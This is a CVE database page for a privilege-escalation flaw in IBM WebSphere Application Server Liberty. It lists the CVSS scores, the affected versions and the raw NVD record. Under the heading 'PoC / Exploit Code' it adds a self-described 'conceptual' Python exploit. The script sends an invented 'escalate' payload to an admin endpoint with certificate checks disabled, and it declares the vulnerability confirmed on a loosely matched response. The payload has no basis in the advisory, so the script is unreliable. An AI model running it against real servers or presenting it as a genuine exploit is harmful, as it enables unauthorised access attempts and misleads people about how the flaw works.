Security Vulnerability Report
中文
CVE-2025-14915 CVSS 6.5 MEDIUM

CVE-2025-14915

Published: 2026-03-25 21:16:24
Last Modified: 2026-03-30 16:59:32

Description

IBM WebSphere Application Server - Liberty 17.0.0.3 through 26.0.0.3 IBM WebSphere Application Server Liberty is affected by privilege escalation. A privileged user could gain additional access to the application server.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:liberty:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:ibm:i:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:ibm:z\/os:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM WebSphere Application Server Liberty 17.0.0.3
IBM WebSphere Application Server Liberty 17.0.0.4
IBM WebSphere Application Server Liberty 18.0.0.1
IBM WebSphere Application Server Liberty 18.0.0.2
IBM WebSphere Application Server Liberty 18.0.0.3
IBM WebSphere Application Server Liberty 19.0.0.1
IBM WebSphere Application Server Liberty 19.0.0.2
IBM WebSphere Application Server Liberty 19.0.0.3
IBM WebSphere Application Server Liberty 20.0.0.1
IBM WebSphere Application Server Liberty 20.0.0.2
IBM WebSphere Application Server Liberty 20.0.0.3
IBM WebSphere Application Server Liberty 20.0.0.4
IBM WebSphere Application Server Liberty 20.0.0.5
IBM WebSphere Application Server Liberty 20.0.0.6
IBM WebSphere Application Server Liberty 20.0.0.7
IBM WebSphere Application Server Liberty 20.0.0.8
IBM WebSphere Application Server Liberty 20.0.0.9
IBM WebSphere Application Server Liberty 20.0.0.10
IBM WebSphere Application Server Liberty 20.0.0.11
IBM WebSphere Application Server Liberty 20.0.0.12
IBM WebSphere Application Server Liberty 21.0.0.1
IBM WebSphere Application Server Liberty 21.0.0.2
IBM WebSphere Application Server Liberty 21.0.0.3
IBM WebSphere Application Server Liberty 21.0.0.4
IBM WebSphere Application Server Liberty 21.0.0.5
IBM WebSphere Application Server Liberty 21.0.0.6
IBM WebSphere Application Server Liberty 21.0.0.7
IBM WebSphere Application Server Liberty 21.0.0.8
IBM WebSphere Application Server Liberty 21.0.0.9
IBM WebSphere Application Server Liberty 21.0.0.10
IBM WebSphere Application Server Liberty 21.0.0.11
IBM WebSphere Application Server Liberty 21.0.0.12
IBM WebSphere Application Server Liberty 22.0.0.1
IBM WebSphere Application Server Liberty 22.0.0.2
IBM WebSphere Application Server Liberty 22.0.0.3
IBM WebSphere Application Server Liberty 22.0.0.4
IBM WebSphere Application Server Liberty 22.0.0.5
IBM WebSphere Application Server Liberty 22.0.0.6
IBM WebSphere Application Server Liberty 22.0.0.7
IBM WebSphere Application Server Liberty 22.0.0.8
IBM WebSphere Application Server Liberty 22.0.0.9
IBM WebSphere Application Server Liberty 22.0.0.10
IBM WebSphere Application Server Liberty 22.0.0.11
IBM WebSphere Application Server Liberty 22.0.0.12
IBM WebSphere Application Server Liberty 22.0.0.13
IBM WebSphere Application Server Liberty 23.0.0.1
IBM WebSphere Application Server Liberty 23.0.0.2
IBM WebSphere Application Server Liberty 23.0.0.3
IBM WebSphere Application Server Liberty 23.0.0.4
IBM WebSphere Application Server Liberty 23.0.0.5
IBM WebSphere Application Server Liberty 23.0.0.6
IBM WebSphere Application Server Liberty 23.0.0.7
IBM WebSphere Application Server Liberty 23.0.0.8
IBM WebSphere Application Server Liberty 23.0.0.9
IBM WebSphere Application Server Liberty 23.0.0.10
IBM WebSphere Application Server Liberty 23.0.0.11
IBM WebSphere Application Server Liberty 23.0.0.12
IBM WebSphere Application Server Liberty 24.0.0.1
IBM WebSphere Application Server Liberty 24.0.0.2
IBM WebSphere Application Server Liberty 24.0.0.3
IBM WebSphere Application Server Liberty 24.0.0.4
IBM WebSphere Application Server Liberty 24.0.0.5
IBM WebSphere Application Server Liberty 24.0.0.6
IBM WebSphere Application Server Liberty 24.0.0.7
IBM WebSphere Application Server Liberty 24.0.0.8
IBM WebSphere Application Server Liberty 24.0.0.9
IBM WebSphere Application Server Liberty 24.0.0.10
IBM WebSphere Application Server Liberty 24.0.0.11
IBM WebSphere Application Server Liberty 24.0.0.12
IBM WebSphere Application Server Liberty 24.0.0.13
IBM WebSphere Application Server Liberty 25.0.0.1
IBM WebSphere Application Server Liberty 25.0.0.2
IBM WebSphere Application Server Liberty 25.0.0.3
IBM WebSphere Application Server Liberty 25.0.0.4
IBM WebSphere Application Server Liberty 25.0.0.5
IBM WebSphere Application Server Liberty 25.0.0.6
IBM WebSphere Application Server Liberty 25.0.0.7
IBM WebSphere Application Server Liberty 25.0.0.8
IBM WebSphere Application Server Liberty 25.0.0.9
IBM WebSphere Application Server Liberty 25.0.0.10
IBM WebSphere Application Server Liberty 25.0.0.11
IBM WebSphere Application Server Liberty 25.0.0.12
IBM WebSphere Application Server Liberty 25.0.0.13
IBM WebSphere Application Server Liberty 26.0.0.1
IBM WebSphere Application Server Liberty 26.0.0.2
IBM WebSphere Application Server Liberty 26.0.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Conceptual PoC for CVE-2025-14915 # Target: IBM WebSphere Application Server Liberty # Note: This requires a valid high-privileged session. target_url = "https://target-server:9443/ibm/api/admin/config/authorization" headers = { "Authorization": "Bearer <valid_high_privilege_token>", "Content-Type": "application/json" } # Payload attempting to exploit privilege escalation payload = { "operation": "escalate", "targetRole": "administrator" } try: response = requests.post(target_url, json=payload, headers=headers, verify=False) if response.status_code == 200 and "administrator" in response.text: print("[+] Privilege escalation vulnerability confirmed!") print("[+] Granted access:", response.json()) else: print("[-] Exploit failed or target patched.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14915", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:24.363", "lastModified": "2026-03-30T16:59:31.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM WebSphere Application Server - Liberty 17.0.0.3 through 26.0.0.3 IBM WebSphere Application Server Liberty is affected by privilege escalation. A privileged user could gain additional access to the application server."}, {"lang": "es", "value": "IBM WebSphere Servidor de Aplicaciones - Liberty 17.0.0.3 hasta 26.0.0.3 IBM WebSphere Servidor de Aplicaciones Liberty se ve afectado por escalada de privilegios. Un usuario privilegiado podría obtener acceso adicional al servidor de aplicaciones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:liberty:*:*:*", "versionStartIncluding": "17.0.0.3", "versionEndExcluding": "26.0.0.4", "matchCriteriaId": "815C3061-AAD1-4A76-9E8C-BAE5F894C6E3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:ibm:i:-:*:*:*:*:*:*:*", "matchCriteriaId": "C684FC45-C9BA-4EF0-BD06-BB289450DD21"}, {"vulnerable": false, "criteria": "cpe:2.3:o:ibm:z\\/os:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E97A964-6F9E-4C87-9B90-21AE2C1DF52F"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267345", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}